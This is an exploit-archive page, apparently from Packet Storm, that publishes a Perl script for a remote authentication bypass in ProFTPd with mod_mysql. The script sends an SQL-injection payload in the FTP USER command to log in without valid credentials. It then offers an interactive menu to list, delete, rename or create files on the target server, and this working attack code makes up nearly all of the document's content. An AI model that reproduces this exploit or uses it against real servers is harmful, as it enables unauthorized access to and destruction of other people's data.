exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ProFTPd With mod_mysql Authentication Bypass

ProFTPd With mod_mysql Authentication Bypass
Posted Feb 11, 2009
Authored by AlpHaNiX

Remote exploit for the authentication bypass vulnerability in ProFTPd using mod_mysql.

tags | exploit, remote, sql injection, bypass
SHA-256 | e1f5b601f8af81df0b2624222de455c263ed411d290e7259eac220962b0c67c4

ProFTPd With mod_mysql Authentication Bypass

Change Mirror Download
# Credits Go For gat3way For Finding The Bug ! [AT] http://milw0rm.com/exploits/8037
# Exploited By AlpHaNiX
# HomePage NullArea.Net
# Greetz For Zigma-Djekmani-r1z

use Net::FTP;

if (@ARGV < 1 ) { print"\n\n\n[+] Usage : ".
"\n\n[+] ./exploit.pl ftp.target.net \n\n" ; exit();}
$host = $ARGV[0];
system("cls") ;
print "----------------------------------------------------------\n".
"[+] ProFTPd with mod_mysql Authentication Bypass Exploit \n".
"[+] Credits Go For gat3way For Finding The Bug !\n".
"[+] Exploited By AlpHaNiX \n".
"[+] NullArea.Net\n".
"----------------------------------------------------------\n"."\n[!] Attacking $host ..." ;
$user = "USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --";
$pass = '1';

$ftp = Net::FTP->new("$host", Debug => 0) or die "[!] Cannot connect to $host";
$ftp->login("$user","$pass") or die "\n\n[!] Couldn't ByPass The authentication ! ", $ftp->message;
print "\n[*] Connected To $host";

print "\n[!] Please Choose A Command To Execute On $host :\n" ;
print "\n\n\n[1] Show Files\n" ;
print "[2] Delete File\n";
print "[3] Rename File or Dir\n";
print "[4] Create A Directory\n";
print "[5] Exit\n";
print "Enter Number Of Command Here => " ;
my $command = <STDIN> ;
chomp $command ;

if ($command==1){&Show}
if ($command==2){&Delete}
if ($command==3){&rename}
if ($command==4){&create_dir}
if ($command==5){&EXIT}
if ($command =! 1||2||3||4||5) {print "\n[!] Not Valid Choise ! Closing..." ;exit()}

sub Show
{
print "\n\n\n[!] Please Specify a directory\n";
my $dir = <STDIN> ;
chomp $dir ;
$ftp->cwd($dir) or $newerr=1;
push @ERRORS, "Can't cd $!\n" if $newerr;
myerr() if $newerr;
$ftp->quit if $newerr;

@files=$ftp->dir or $newerr=1;
push @ERRORS, "Can't get file list $!\n" if $newerr;
myerr() if $newerr;
print "Got file list\n";
foreach(@files) {
print "$_\n";

}
exit();
}

sub Delete
{
print "\n\n\n[!] Please Specify a File To Delete\n";
my $file = <STDIN> ;
chomp $file ;
$ftp->delete($file) or die "\n[!] Error while Deleting $file => " , $ftp->message ;
print "\n[!] $file Deleted !";
}

sub rename
{
print "\n\n\n[!] Please Specify a File To Rename\n";
my $file = <STDIN> ;
chomp $file ;
print "\n[!] Please Specify a New Name For $file\n";
my $name = <STDIN> ;
chomp $name ;
$ftp->rename($file,$name) or die "\n[!] Error while Renaming $file => " , $ftp->message ;
print "\n[!] $file Renamed to $name !";
}


sub create_dir
{
print "\n\n\n[!] Please Specify a Directory Name To create\n";
my $dir = <STDIN> ;
chomp $dir ;
$ftp->mkdir($dir) or die "\n[!] Error while creating $dir => " , $ftp->message ;
print "\n[!] $dir Created !";
}

sub EXIT
{
system("cls");
$ftp->quit;
exit();
}
Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    10 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    37 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close